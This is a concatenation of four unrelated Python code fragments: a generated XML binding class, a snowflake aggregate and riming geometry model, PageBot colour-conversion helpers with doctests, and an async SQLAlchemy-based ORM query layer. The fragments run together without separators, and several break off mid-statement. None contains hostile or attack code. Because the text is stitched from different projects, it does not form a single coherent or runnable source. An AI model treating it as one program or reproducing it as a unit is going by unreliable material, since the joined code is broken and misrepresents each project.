already_processed: already_processed.append('bgColor') showIndent(outfile, level) outfile.write('bgColor = %s,\n' % (self.bgColor,)) if self.feID is not None and 'feID' not in already_processed: already_processed.append('feID') showIndent(outfile, level) outfile.write('feID = %d,\n' % (self.feID,)) if self.start is not None and 'start' not in already_processed: already_processed.append('start') showIndent(outfile, level) outfile.write('start = %s,\n' % (self.start,)) if self.end is not None and 'end' not in already_processed: already_processed.append('end') showIndent(outfile, level) outfile.write('end = %s,\n' % (self.end,)) if self.cBy is not None and 'cBy' not in already_processed: already_processed.append('cBy') showIndent(outfile, level) outfile.write('cBy = "%s",\n' % (self.cBy,)) if self.fgColor is not None and 'fgColor' not in already_processed: already_processed.append('fgColor') showIndent(outfile, level) outfile.write('fgColor = %s,\n' % (self.fgColor,)) def exportLiteralChildren(self, outfile, level, name_): pass def build(self, node): self.buildAttributes(node, node.attrib, []) self.valueOf_ = get_all_text_(node) for child in node: nodeName_ = Tag_pattern_.match(child.tag).groups()[-1] self.buildChildren(child, node, nodeName_) def buildAttributes(self, node, attrs, already_processed): value = attrs.get('itype') if value is not None and 'itype' not in already_processed: already_processed.append('itype') self.itype = value value = attrs.get('name') if value is not None and 'name' not in already_processed: already_processed.append('name') self.name = value value = attrs.get('bgColor') if value is not None and 'bgColor' not in already_processed: already_processed.append('bgColor') self.bgColor = value value = attrs.get('feID') if value is not None and 'feID' not in already_processed: already_processed.append('feID') try: self.feID = int(value) except ValueError, exp: raise_parse_error(node, 'Bad integer attribute: %s' % exp) value = attrs.get('start') if 
value is not None and 'start' not in already_processed: already_processed.append('start') self.start = value value = attrs.get('end') if value is not None and 'end' not in already_processed: already_processed.append('end') self.end = value value = attrs.get('cBy') if value is not None and 'cBy' not in already_processed: already_processed.append('cBy') self.cBy = value value = attrs.get('fgColor') if value is not None and 'fgColor' not in already_processed: already_processed.append('fgColor') self.fgColor = value def buildChildren(self, child_, node, nodeName_, fromsubclass_=False): pass # end class labelType class lexemeType(GeneratedsSuper): subclass = None superclass = None def __init__(self, order=None, headword=None, breakBefore=None, name=None, POS=None, valueOf_=None): self.order = _cast(None, order) self.headword = _cast(bool, headword) self.breakBefore = _cast(bool, breakBefore) self.name = _cast(None, name) self.POS = _cast(None, POS) self.valueOf_ = valueOf_ def factory(*args_, **kwargs_): if lexemeType.subclass: return lexemeType.subclass(*args_, **kwargs_) else: return lexemeType(*args_, **kwargs_) factory = staticmethod(factory) def get_order(self): return self.order def set_order(self, order): self.order = order def get_headword(self): return self.headword def set_headword(self, headword): self.headword = headword def get_breakBefore(self): return self.breakBefore def set_breakBefore(self, breakBefore): self.breakBefore = breakBefore def get_name(self): return self.name def set_name(self, name): self.name = name def get_POS(self): return self.POS def set_POS(self, POS): self.POS = POS def get_valueOf_(self): return self.valueOf_ def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_ def export(self, outfile, level, namespace_='fn:', name_='lexemeType', namespacedef_=''): showIndent(outfile, level) outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', )) self.exportAttributes(outfile, level, [], namespace_, 
name_='lexemeType') if self.hasContent_(): outfile.write('>') outfile.write(self.valueOf_) self.exportChildren(outfile, level + 1, namespace_, name_) outfile.write('</%s%s>\n' % (namespace_, name_)) else: outfile.write('/>\n') def exportAttributes(self, outfile, level, already_processed, namespace_='fn:', name_='lexemeType'): if self.order is not None and 'order' not in already_processed: already_processed.append('order') outfile.write(' order=%s' % (quote_attrib(self.order), )) if self.headword is not None and 'headword' not in already_processed: already_processed.append('headword') outfile.write(' headword="%s"' % self.gds_format_boolean(self.gds_str_lower(str(self.headword)), input_name='headword')) if self.breakBefore is not None and 'breakBefore' not in already_processed: already_processed.append('breakBefore') outfile.write(' breakBefore="%s"' % self.gds_format_boolean(self.gds_str_lower(str(self.breakBefore)), input_name='breakBefore')) if self.name is not None
""" # measurements of the other particle if particle is None: particle = self._generator.generate().T x = particle[:,0] y = particle[:,1] z = particle[:,2] extent = [[x.min(), x.max()], [y.min(), y.max()], [z.min(), z.max()]] grid_res = self.grid_res grid_res_sqr = grid_res**2 # limits for random positioning of the other particle x0 = (self.extent[0][0]-extent[0][1]) x1 = (self.extent[0][1]-extent[0][0]) y0 = (self.extent[1][0]-extent[1][1]) y1 = (self.extent[1][1]-extent[1][0]) site_found = False while not site_found: # randomize location in x,y plane x_shift = x0+np.random.rand()*(x1-x0) y_shift = y0+np.random.rand()*(y1-y0) xs = x+x_shift ys = y+y_shift # the overlap between this aggregate and the other particle in # the shifted position overlapping_range = \ [max(xs.min(),self.extent[0][0])-grid_res, min(xs.max(),self.extent[0][1])+grid_res, max(ys.min(),self.extent[1][0])-grid_res, min(ys.max(),self.extent[1][1])+grid_res] if (overlapping_range[0] >= overlapping_range[1]) or \ (overlapping_range[2] >= overlapping_range[3]): # no overlap, so impossible to connect -> stop if required: continue else: break # elements from this particle that are candidates for connection X_filter = \ (self.X[:,0] >= overlapping_range[0]) & \ (self.X[:,0] < overlapping_range[1]) & \ (self.X[:,1] >= overlapping_range[2]) & \ (self.X[:,1] < overlapping_range[3]) overlapping_X = self.X[X_filter,:] if not len(overlapping_X): if required: continue else: break # index candidate particles in x,y plane elem_index = Index2D(elem_size=grid_res) elem_index.insert(overlapping_X[:,:2],overlapping_X) # candidates from the other particle X_filter = \ (xs >= overlapping_range[0]) & \ (xs < overlapping_range[1]) & \ (ys >= overlapping_range[2]) & \ (ys < overlapping_range[3]) overlapping_Xp = np.vstack(( xs[X_filter],ys[X_filter],z[X_filter])).T # find displacement in z direction min_z_sep = np.inf for elem in overlapping_Xp: # find elements in this aggregate that are near the # currently tested 
element in the x,y plane candidates = elem_index.items_near(elem[:2], grid_res) min_z_sep = min(min_z_sep, min_z_separation(candidates, elem, grid_res_sqr)) site_found = not np.isinf(min_z_sep) if not required: break if site_found: # move the candidate to the right location in the z direction zs = z+min_z_sep+pen_depth p_shift = np.vstack((xs,ys,zs)).T if ident is None: ident = np.zeros(p_shift.shape[0], dtype=np.int32) self.add_elements(p_shift, ident=ident) return site_found def align(self): """Align the aggregate along the principal axes. The longest principal axis becomes oriented along the x-axis, the second longest along the y-axis, and the shortest along the z-axis. """ # get and normalize principal axes PA = self.principal_axes() PA /= np.sqrt((PA**2).sum(0)) # project to principal axes self.X = np.dot(self.X,PA) self.update_extent() def rotate(self,rotator): """Rotate the aggregate. Args: rotator: The rotator to be used for the rotation. See the rotator module. """ self.X = self.X-self.X.mean(0) self.X = rotator.rotate(self.X.T).T self.update_extent() def visualize(self, bgcolor=(1,1,1), fgcolor=(.8,.8,.8)): """Visualize the aggregate using Mayavi. Args: bgcolor: Background color for the Mayavi scene. fgcolor: Foreground color for the Mayavi scene. """ color_list = [colors.colorConverter.to_rgb(c) for c in [ "#a6cee3", "#1f78b4", "#b2df8a", "#33a02c", "#fb9a99", "#e31a1c", "#fdbf6f", "#ff7f00", "#cab2d6", "#6a3d9a", "#ffff99", "#b15928" ]] # local import as this can take a while from mayavi import mlab mlab.figure(bgcolor=bgcolor, fgcolor=fgcolor) i = 0 for ident in xrange(self.ident.min(), self.ident.max()+1): X = self.X[self.ident==ident,:] if X.shape[0] > 0: mlab.points3d(X[:,0], X[:,1], X[:,2], color=color_list[i%len(color_list)], mode="cube", scale_factor=self._generator.grid_res) i += 1 def grid(self, res=None): """Arrange elements on a regular grid. 
The gridded coordinates are the element coordinates divided by the res parameter and then rounded to the nearest integer. This routine both conserves the number of elements and gives a unique grid location for each aggregate element. If more than one elements would end up in the same grid location, all but one are relocated into nearby empty spots on the grid. Args: res: The resolution of the grid. Should be usually left at the default, which is the aggregate element spacing. Returns: An integer array with the gridded element coordinates as multiples of res. """ if res==None: res = self.grid_res # This does most of the work! Xc = (self.X/res).round().astype(int) # The rest is to identify elements that would end up in the same # location and move them around N = Xc.shape[0] sort_ind = np.lexsort((Xc[:,2],Xc[:,1],Xc[:,0])) Xc = Xc[sort_ind,:] overlap = abs(np.diff(Xc,axis=0)).sum(1) == 0 overlap = np.hstack((overlap, False)) Xc_overlap = Xc[overlap,:].copy() Xc = Xc[~overlap,:] np.random.shuffle(Xc_overlap) for i in xrange(Xc_overlap.shape[0]): Xm = Xc_overlap[i,:] for dX in neighbors_by_distance(): X = Xm+dX if not row_is_in_sorted_array(X, Xc): Xc = insert_missing_row_in_sorted_array(X, Xc) break return Xc def add_elements(self, added_elements, ident=0, update=True): """Add elements to this aggregate. Args: added_elements: A (N,3) array with the coordinates of the added elements. ident: A (N,) array with the numerical identifiers of the added elements. update: If True, the coordinates are recentered after the update. This is should usually be left at True, but if you call add_elements multiple times without calls to other Aggregate member functions, it will save computational effort to set update=False and then call update_coordinates manually after you're done. 
""" self.X = np.vstack((self.X, added_elements)) self.ident = np.hstack((self.ident, np.full(added_elements.shape[0], ident, dtype=np.int32))) if update: self.update_coordinates() def remove_elements(self, removed_elements, tolerance=0.001, update=True): """Remove elements found at the given coordinates. Args: removed_elements: The coordinates of the elements to remove. tolerance: The distance from each coordinate in removed_elements, in multiples of grid_res, in which the elements should be removed. update: See the update keyword argument in add_elements. """ keep = np.ones(self.X.shape[0], dtype=bool) for re in removed_elements: dist_sqr = ((self.X-re)**2).sum(1) min_dist = dist_sqr.argmin() keep[dist_sqr < (self.grid_res**2 * tolerance)] = False self.X = self.X[keep,:] self.ident = self.ident[keep] if update: self.update_coordinates() def update_coordinates(self): """Recenter the aggregate and update the particle extent. """ self.X -= self.X.mean(0) self.update_extent() def spheres_overlap(X0, X1, r_sqr): return (X1[0]-X0[0])**2 + (X1[1]-X0[1])**2 + \ (X1[2]-X0[2])**2 < r_sqr def compare_row(x,y): if x[0] > y[0]: return 1 elif x[0] < y[0]: return -1 elif len(x)>1: return compare_row(x[1:],y[1:]) else: return 0 def row_is_in_sorted_array(r, x): i0 = 0 i1 = x.shape[0] while (i1-i0)>1: i = (i0+i1)//2 c = compare_row(r,x[i,:]) if c == 0: return True elif c == 1: i0=i else: i1=i return not bool(compare_row(r,x[i0,:])) def insert_missing_row_in_sorted_array(r, x): i0 = 0 i1 = x.shape[0] while (i1-i0)>1: i = (i0+i1)//2 c = compare_row(r,x[i,:]) if c == 1: i0=i else: i1=i if i1 > 1: insert_ind = i1 else: insert_ind = 1 if compare_row(r,x[i0,:])==1 else 0 return np.vstack((x[:insert_ind,:], r.reshape((1,3)), x[insert_ind:,:])) def outer_layer_of_cube(cube_rad): """Outer layer of cube. Generates the coordinates on the outer layer of a cube centered at (0,0,0) with side of (2*cube_rad+1). 
""" irange = list(xrange(-cube_rad, cube_rad+1)) for dx in irange: for dy in irange: if (abs(dx)==cube_rad) or (abs(dy)==cube_rad): dz_iter = irange else: dz_iter = (-cube_rad, cube_rad) for dz in dz_iter: yield (dx, dy, dz) def neighbors_by_distance(): cube_rad = 1 while True: for p in outer_layer_of_cube(cube_rad): yield p cube_rad += 1 class RimedAggregate(Aggregate): """A volume-element rimed aggregate model. This class adds the add_rime_particles member function to the Aggregate base class. See the documentation for Aggregate for more information. """ RIME_IDENT = -1 def add_rime_particles(self, N=1, pen_depth=120e-6, compact_dist=0.): """Add rime particles to the aggregate. Args: N: Number of rime particles to add. pen_depth: The penetration depth, i.e. the distance that the rime particle is allowed to penetrate inside this particle. """ grid_res = self.grid_res grid_res_sqr = grid_res**2 # limits for random positioning of rime particle x0 = (self.extent[0][0]) x1 = (self.extent[0][1]) y0 = (self.extent[1][0]) y1 = (self.extent[1][1]) use_indexing = (N > 1) if use_indexing: elem_index = Index2D(elem_size=grid_res) elem_index.insert(self.X[:,:2],self.X) def find_overlapping(x,y,dist_mul=1): p_near = np.array(list(elem_index.items_near((x,y), grid_res*dist_mul))) if not p_near.shape[0]: return p_near p_filter = ((p_near[:,:2]-[x,y])**2).sum(1) < grid_res_sqr*dist_mul**2 return p_near[p_filter,:] else: def find_overlapping(x,y,dist_mul=1): X_filter = ((self.X[:,:2] - np.array([x,y]))**2).sum(1) < grid_res_sqr*dist_mul**2 return self.X[X_filter,:] if compact_dist > 0: if use_indexing: elem_index_3d = Index3D(elem_size=grid_res) elem_index_3d.insert(self.X) def find_overlapping_3d(x,y,z,dist_mul=1): p_near = np.array(list(elem_index_3d.items_near((x,y,z), grid_res*dist_mul))) if not p_near.shape[0]: return p_near p_filter = ((p_near-[x,y,z])**2).sum(1) < grid_res_sqr*dist_mul**2 return p_near[p_filter,:] else: def find_overlapping_3d(x,y,z,dist_mul=1): X_filter = 
((self.X - np.array([x,y,z]))**2).sum(1) < grid_res_sqr*dist_mul**2 return self.X[X_filter,:] added_particles = np.empty((N, 3)) for particle_num in xrange(N): site_found = False while not site_found: xs = x0+np.random.rand()*(x1-x0) ys = y0+np.random.rand()*(y1-y0) overlapping_range = [xs-grid_res, xs+grid_res, ys-grid_res, ys+grid_res] overlapping_X = find_overlapping(xs, ys) if not overlapping_X.shape[0]: continue X_order = overlapping_X[:,2].argsort() overlapping_X = overlapping_X[X_order,:] last_ind =
#!/usr/bin/env python3 # -*- coding: UTF-8 -*- # ----------------------------------------------------------------------------- # # P A G E B O T N A N O # # Copyright (c) 2020+ <NAME> + <NAME> # www.pagebot.io # Licensed under MIT conditions # # Supporting DrawBot, www.drawbot.com # ----------------------------------------------------------------------------- # # color.py # # This source contains supporting functions for PageBotNano classes. # from copy import copy import sys sys.path.insert(0, "../..") # So we can import pagebotnano without installing. from pagebot.constants import CSS_COLOR_NAMES, SPOT_RGB, RAL_NAMERGB, NAME_RALRGB def value01(v): """Round float to 0 or 1 int if equal. >>> value01(0.0) 0 >>> value01(1.0) 1 >>> value01(0.5) 0.5 >>> value01(False) 0 >>> value01(100) 1 """ if v <= 0: return 0 if v >= 1: return 1 return v def asRgb(c, *args): """Answers the color as RGB tuple. If `c` is a list or a tuple, then answer the RGB tuples in the same structure. >>> asRgb(color(1, 0, 0)) (1, 0, 0) >>> asRgb(color(1, 0, 0), color(0, 1, 0)) ((1, 0, 0), (0, 1, 0)) >>> # Nested tuples. >>> asRgb(color(1, 0, 0), (color(0, 1, 0), color(0, 0, 1))) ((1, 0, 0), ((0, 1, 0), (0, 0, 1))) >>> # Interpreted as list of colors, not as RGB values for one color. >>> asRgb(1, 0, 0) ((1, 1, 1), (0, 0, 0), (0, 0, 0)) """ if args: if not isinstance(c, (list, tuple)): c = [c] c = list(c) for arg in args: c.append(arg) if isinstance(c, (list, tuple)): rcc = [] for cc in c: cc = asRgb(cc) rcc.append(cc) return tuple(rcc) if not isinstance(c, Color): c = color(c) if c is not None: return c.rgb return None def int2Rgb(v): """Converts an integer (basically the value of the hex string) to (r, g, b). 
    >>> '%0.2f, %0.2f, %0.2f' % int2Rgb(12345)
    '0.00, 0.19, 0.22'
    >>> '%0.2f, %0.2f, %0.2f' % int2Rgb(65281)
    '0.00, 1.00, 0.00'
    >>> int2Rgb(255)
    (0, 0, 1)
    >>> int2Rgb(255**2 + 255)
    (0, 1, 0)
    >>> color('#FFFFFF').int
    16777215
    >>> color('#888888').int
    8947848
    >>> color('#0000FF').int
    255
    """
    # Extract the three 8-bit channels and scale each to the 0..1 range.
    return value01(((v >> 16) & 255)/255.0), value01(((v >> 8) & 255)/255.0), value01((v & 255)/255.0)

def cmyk2Rgb(cmyk) :
    """Simple straight conversion from (c,m,y,k) to (r,g,b), not using any
    profiles.

    >>> cmyk2Rgb((1, 1, 0, 0))
    (0, 0, 1)
    >>> # Bi-direcional conversion test.
    >>> cmyk = rgb2Cmyk((1, 1, 0))
    >>> cmyk2Rgb(cmyk)
    (1, 1, 0)
    >>> # Bi-direcional conversion test.
    >>> cmyk = rgb2Cmyk((1, 0.5, 0))
    >>> cmyk2Rgb((cmyk))
    (1, 0.5, 0)
    """
    c, m, y, k = cmyk
    # Each channel folds the key (black) component in, clamps at 1,
    # then inverts from ink coverage to light intensity.
    return (
        value01(1 - ((min(1.0, c * (1 - k) + k)))),
        value01(1 - ((min(1, m * (1 - k) + k)))),
        value01(1 - ((min(1, y * (1 - k) + k))))
    )

def rgb2Cmyk(rgb):
    """Simple straight conversion from (r,g,b) to (c,m,y,k), not using any
    profiles).

    >>> rgb2Cmyk((0, 0, 0))
    (0, 0, 0, 1)
    >>> rgb2Cmyk((1, 0, 0))
    (0, 1, 1, 0)
    >>> rgb2Cmyk((1, 1, 0))
    (0, 0, 1, 0)
    >>> rgb2Cmyk((1, 1, 1))
    (0, 0, 0, 0)
    >>> rgb2Cmyk((0.5, 0.5, 0.5))
    (0, 0, 0, 0.5)
    """
    if rgb == (0, 0, 0): # black
        return 0, 0, 0, 1 # K = cmyk scale
    r, g, b = rgb
    # rgb [0,1] -> cmy [0,1]
    c = 1 - r
    m = 1 - g
    y = 1 - b
    # extract out k [0,1]: the shared gray component becomes the key plate.
    min_cmy = min(c, m, y)
    c -= min_cmy
    m -= min_cmy
    y -= min_cmy
    k = min_cmy
    # rescale to the range [0,cmyk_scale]
    return value01(c), value01(m), value01(y), value01(k)

def ral2NameRgb(ral, default=None):
    """Answers the RGB of RAL color number or name. If the value does not
    exist, answer default or black.

    >>> ral2NameRgb('red')[0] in ('rubyred', 'winered')
    True
    """
    nameRgb = None
    if isinstance(ral, str):
        ral = ral.lower()
    # Exact lookup first: by RAL number (or exact lowercased key) in
    # RAL_NAMERGB, then by exact name in NAME_RALRGB.
    if ral in RAL_NAMERGB:
        nameRgb = RAL_NAMERGB[ral]
    elif ral in NAME_RALRGB:
        nameRgb = ral, NAME_RALRGB[ral][1]
    if isinstance(ral, str):
        # It's a name but not matching. Try smallest name that includes it.
# Note that for "gray" and "grey" search, this may result in different findings. length = None for name, (_, rgb) in NAME_RALRGB.items(): if ral in name and (length is None or len(name) < length): nameRgb = name, rgb length = len(name) if nameRgb is None: nameRgb = default or ('black', (0, 0, 0)) return nameRgb def ral2Rgb(ral, default=None): """Answers the RGB or RAL color number or name. >>> '%0.2f, %0.2f, %0.2f' % ral2Rgb(9002) '0.94, 0.93, 0.90' >>> '%0.2f, %0.2f, %0.2f' % ral2Rgb('light green') '0.49, 0.80, 0.74' >>> '%0.2f, %0.2f, %0.2f' % ral2Rgb('dustygray') '0.47, 0.49, 0.50' >>> ral2Rgb('lightgreen') == ral2Rgb('light green') True >>> ral2Rgb('umbra grey') == ral2Rgb('umbra gray') True >>> ral2Rgb('grey') == ral2Rgb('gray') # Partial name finds other result False """ """ FIXME (issue : >>> '%0.2f, %0.2f, %0.2f' % ral2Rgb('red') Sublime says: '0.31, 0.07, 0.10' Travis says: '0.54, 0.07, 0.08' """ return ral2NameRgb(ral, default)[1] def rgb2RalName(rgb): """Answers the closest spot value that fits the RGB value. >>> rgb2RalName((0.49, 0.80, 0.74)) (6027, 'light green') >>> rgb2RalName((0, 0, 0)) (9005, 'jet black') >>> rgb2RalName((1, 1, 1)) (9003, 'signal white') >>> rgb2RalName((1, 1, 1)) (9003, 'signal white') >>> rgb2RalName((0.5, 0.5, 0.5)) (7037, 'dusty grey') """ foundRal = None r, g, b, = rgb error = None # Max combined error for the 3 colors. for ral, (name, (rr, rg, rb)) in RAL_NAMERGB.items(): e = abs(rr - r) + abs(rg - g) + abs(rb - b) if error is None or e < error: foundRal = ral, name error = e return foundRal def spot2Rgb(spot, default=None): """Answers the RGB value of spot color. If the value does not exist, answer default of black. >>> '%0.2f, %0.2f, %0.2f' % spot2Rgb(300) '0.00, 0.45, 0.78' >>> # Nonexistent spot colors map to default or black. >>> spot2Rgb(10000000) (0, 0, 0) """ return SPOT_RGB.get(spot, default or (0, 0, 0)) def rgb2Spot(rgb): """Answers the closest spot value that fits the RGB value. 
>>> color(0.98, 0.89, 0.5).spot 120 >>> rgb = color(spot=300).rgb >>> color(rgb=rgb).spot 300 >>> color(rgb=color(spot=110).rgb).spot # Double direction conversion test. 110 """ foundSpot = None r, g, b, = rgb error = None # Max combined error for the 3 colors. for spot, (sr, sg, sb) in SPOT_RGB.items(): e = abs(sr - r) + abs(sg - g) + abs(sb - b) if error is None or e < error: foundSpot = spot error = e return foundSpot def spot2Cmyk(spot, default=None): """Answers the CMYK value of spot color. If the value does not exist, answer default of black. Note that this is a double conversion: spot-->rgb-->cmyk >>> '%0.2f, %0.2f, %0.2f, %0.2f' % spot2Cmyk(300) '0.78, 0.33, 0.00, 0.22' >>> # Nonexistent spot colors map to default or black. >>> spot2Cmyk(10000000) (0, 0, 0, 1) """ return rgb2Cmyk(spot2Rgb(spot, default=default)) def cmyk2Spot(cmyk): """Answers the closest spot value that fits the CMYK value. Note that this is a double conversion: cmyk-->rgb-->spot >>> color(c=0.25, m=0.24, y=0.00, k=0.67).spot 533 >>> color(spot=533).cmyk == spot2Cmyk(533) True >>> color(c=0.25, m=0.24, y=0.00, k=0.67).spot 533 >>> cmyk = color(spot=300).cmyk >>> #Color(cmyk=cmyk).spot # TODO: answers 285. Roundings? 300 >>> #Color(cmyk=color(spot=110).cmyk).spot # Double direction conversion test. 110 """ return rgb2Spot(cmyk2Rgb(cmyk)) def name2Rgb(name): """Method to convert a name to RGB. Answer None if no RGB can be found. >>> name2Rgb('red') (1, 0, 0) >>> name2Rgb('white') (1, 1, 1) >>> colorName = 'slategray' >>> # Get nearest rounded (r,g,b) for this spot color. >>> rgb = name2Rgb(colorName) >>> '%0.2f, %0.2f, %0.2f' % rgb '0.44, 0.50, 0.56' """ return int2Rgb(CSS_COLOR_NAMES.get(name)) def rgb2Name(rgb): """Method to convert RGB to a name. Answer None if no name can be found. 
>>> rgb2Name((0.2, 0.3, 0.4)) in ('darkslategray', 'darkslategrey') True >>> color(spot=300).name in ('teal', 'darkcyan') True >>> color(spot=0).name 'black' >>> color(rgb=(0.4, 0.5, 0.6)).name in ('slategrey', 'slategray') True >>> color(cmyk=(0.2, 0.2, 0.6, 0.2)).name 'darkkhaki' >>> rgb = (0.4, 0.5, 0.6) >>> color(rgb=rgb).name == rgb2Name(rgb) True """ rgbName = None r, g, b = rgb error = None # Max error for the 3 colors for name, value in CSS_COLOR_NAMES.items(): nr, ng, nb = int2Rgb(value) e = abs(nr - r) + abs(ng - g) + abs(nb - b) if error is None or e < error: rgbName = name error =
<reponame>eliclement/orm import typing import databases import sqlalchemy import typesystem from sqlalchemy.ext.asyncio import create_async_engine from orm.exceptions import MultipleMatches, NoMatch from orm.fields import Date, DateTime, String, Text FILTER_OPERATORS = { "exact": "__eq__", "iexact": "ilike", "contains": "like", "icontains": "ilike", "in": "in_", "gt": "__gt__", "gte": "__ge__", "lt": "__lt__", "lte": "__le__", } def _update_auto_now_fields(values, fields): for key, value in fields.items(): if isinstance(value, (DateTime, Date)) and value.auto_now: values[key] = value.validator.get_default_value() return values class ModelRegistry: def __init__(self, database: databases.Database) -> None: self.database = database self.models = {} self._metadata = sqlalchemy.MetaData() @property def metadata(self): for model_cls in self.models.values(): model_cls.build_table() return self._metadata async def create_all(self): url = self._get_database_url() engine = create_async_engine(url) async with self.database: async with engine.begin() as conn: await conn.run_sync(self.metadata.create_all) await engine.dispose() async def drop_all(self): url = self._get_database_url() engine = create_async_engine(url) async with self.database: async with engine.begin() as conn: await conn.run_sync(self.metadata.drop_all) await engine.dispose() def _get_database_url(self) -> str: url = self.database.url if not url.driver: if url.dialect == "postgresql": url = url.replace(driver="asyncpg") elif url.dialect == "mysql": url = url.replace(driver="aiomysql") elif url.dialect == "sqlite": url = url.replace(driver="aiosqlite") return str(url) class ModelMeta(type): def __new__(cls, name, bases, attrs): model_class = super().__new__(cls, name, bases, attrs) if "registry" in attrs: model_class.database = attrs["registry"].database attrs["registry"].models[name] = model_class if "tablename" not in attrs: setattr(model_class, "tablename", name.lower()) for name, field in attrs.get("fields", 
{}).items(): setattr(field, "registry", attrs.get("registry")) if field.primary_key: model_class.pkname = name return model_class @property def table(cls): if not hasattr(cls, "_table"): cls._table = cls.build_table() return cls._table @property def columns(cls) -> sqlalchemy.sql.ColumnCollection: return cls._table.columns class QuerySet: ESCAPE_CHARACTERS = ["%", "_"] def __init__( self, model_cls=None, filter_clauses=None, select_related=None, limit_count=None, offset=None, order_by=None, ): self.model_cls = model_cls self.filter_clauses = [] if filter_clauses is None else filter_clauses self._select_related = [] if select_related is None else select_related self.limit_count = limit_count self.query_offset = offset self._order_by = [] if order_by is None else order_by def __get__(self, instance, owner): return self.__class__(model_cls=owner) @property def database(self): return self.model_cls.registry.database @property def table(self) -> sqlalchemy.Table: return self.model_cls.table @property def schema(self): fields = {key: field.validator for key, field in self.model_cls.fields.items()} return typesystem.Schema(fields=fields) @property def pkname(self): return self.model_cls.pkname def _build_select_expression(self): tables = [self.table] select_from = self.table for item in self._select_related: model_cls = self.model_cls select_from = self.table for part in item.split("__"): model_cls = model_cls.fields[part].target table = model_cls.table select_from = sqlalchemy.sql.join(select_from, table) tables.append(table) expr = sqlalchemy.sql.select(tables) expr = expr.select_from(select_from) if self.filter_clauses: if len(self.filter_clauses) == 1: clause = self.filter_clauses[0] else: clause = sqlalchemy.sql.and_(*self.filter_clauses) expr = expr.where(clause) if self._order_by: order_by = list(map(self._prepare_order_by, self._order_by)) expr = expr.order_by(*order_by) if self.limit_count: expr = expr.limit(self.limit_count) if self.query_offset: expr = 
expr.offset(self.query_offset) return expr def filter( self, clause: typing.Optional[sqlalchemy.sql.expression.BinaryExpression] = None, **kwargs: typing.Any, ): if clause is not None: self.filter_clauses.append(clause) return self else: return self._filter_query(**kwargs) def exclude( self, clause: typing.Optional[sqlalchemy.sql.expression.BinaryExpression] = None, **kwargs: typing.Any, ): if clause is not None: self.filter_clauses.append(clause) return self else: return self._filter_query(_exclude=True, **kwargs) def _filter_query(self, _exclude: bool = False, **kwargs): clauses = [] filter_clauses = self.filter_clauses select_related = list(self._select_related) if kwargs.get("pk"): pk_name = self.model_cls.pkname kwargs[pk_name] = kwargs.pop("pk") for key, value in kwargs.items(): if "__" in key: parts = key.split("__") # Determine if we should treat the final part as a # filter operator or as a related field. if parts[-1] in FILTER_OPERATORS: op = parts[-1] field_name = parts[-2] related_parts = parts[:-2] else: op = "exact" field_name = parts[-1] related_parts = parts[:-1] model_cls = self.model_cls if related_parts: # Add any implied select_related related_str = "__".join(related_parts) if related_str not in select_related: select_related.append(related_str) # Walk the relationships to the actual model class # against which the comparison is being made. 
for part in related_parts: model_cls = model_cls.fields[part].target column = model_cls.table.columns[field_name] else: op = "exact" column = self.table.columns[key] # Map the operation code onto SQLAlchemy's ColumnElement # https://docs.sqlalchemy.org/en/latest/core/sqlelement.html#sqlalchemy.sql.expression.ColumnElement op_attr = FILTER_OPERATORS[op] has_escaped_character = False if op in ["contains", "icontains"]: has_escaped_character = any( c for c in self.ESCAPE_CHARACTERS if c in value ) if has_escaped_character: # enable escape modifier for char in self.ESCAPE_CHARACTERS: value = value.replace(char, f"\\{char}") value = f"%{value}%" if isinstance(value, Model): value = value.pk clause = getattr(column, op_attr)(value) clause.modifiers["escape"] = "\\" if has_escaped_character else None clauses.append(clause) if _exclude: filter_clauses.append(sqlalchemy.not_(sqlalchemy.sql.and_(*clauses))) else: filter_clauses += clauses return self.__class__( model_cls=self.model_cls, filter_clauses=filter_clauses, select_related=select_related, limit_count=self.limit_count, offset=self.query_offset, order_by=self._order_by, ) def search(self, term: typing.Any): if not term: return self filter_clauses = list(self.filter_clauses) value = f"%{term}%" # has_escaped_character = any(c for c in self.ESCAPE_CHARACTERS if c in term) # if has_escaped_character: # # enable escape modifier # for char in self.ESCAPE_CHARACTERS: # term = term.replace(char, f'\\{char}') # term = f"%{value}%" # # clause.modifiers['escape'] = '\\' if has_escaped_character else None search_fields = [ name for name, field in self.model_cls.fields.items() if isinstance(field, (String, Text)) ] search_clauses = [ self.table.columns[name].ilike(value) for name in search_fields ] if len(search_clauses) > 1: filter_clauses.append(sqlalchemy.sql.or_(*search_clauses)) else: filter_clauses.extend(search_clauses) return self.__class__( model_cls=self.model_cls, filter_clauses=filter_clauses, 
select_related=self._select_related, limit_count=self.limit_count, offset=self.query_offset, order_by=self._order_by, ) def order_by(self, *order_by): return self.__class__( model_cls=self.model_cls, filter_clauses=self.filter_clauses, select_related=self._select_related, limit_count=self.limit_count, offset=self.query_offset, order_by=order_by, ) def select_related(self, related): if not isinstance(related, (list, tuple)): related = [related] related = list(self._select_related) + related return self.__class__( model_cls=self.model_cls, filter_clauses=self.filter_clauses, select_related=related, limit_count=self.limit_count, offset=self.query_offset, order_by=self._order_by, ) async def exists(self) -> bool: expr = self._build_select_expression() expr = sqlalchemy.exists(expr).select() return await self.database.fetch_val(expr) def limit(self, limit_count: int): return self.__class__( model_cls=self.model_cls, filter_clauses=self.filter_clauses, select_related=self._select_related, limit_count=limit_count, offset=self.query_offset, order_by=self._order_by, ) def offset(self, offset: int): return self.__class__( model_cls=self.model_cls, filter_clauses=self.filter_clauses, select_related=self._select_related, limit_count=self.limit_count, offset=offset, order_by=self._order_by, ) async def count(self) -> int: expr = self._build_select_expression().alias("subquery_for_count") expr = sqlalchemy.func.count().select().select_from(expr) return await self.database.fetch_val(expr) async def all(self, **kwargs): if kwargs: return await self.filter(**kwargs).all() expr = self._build_select_expression() rows = await self.database.fetch_all(expr) return [ self.model_cls._from_row(row, select_related=self._select_related) for row in rows ] async def get(self, **kwargs): if kwargs: return await self.filter(**kwargs).get() expr = self._build_select_expression().limit(2) rows = await self.database.fetch_all(expr) if not rows: raise NoMatch() if len(rows) > 1: raise 
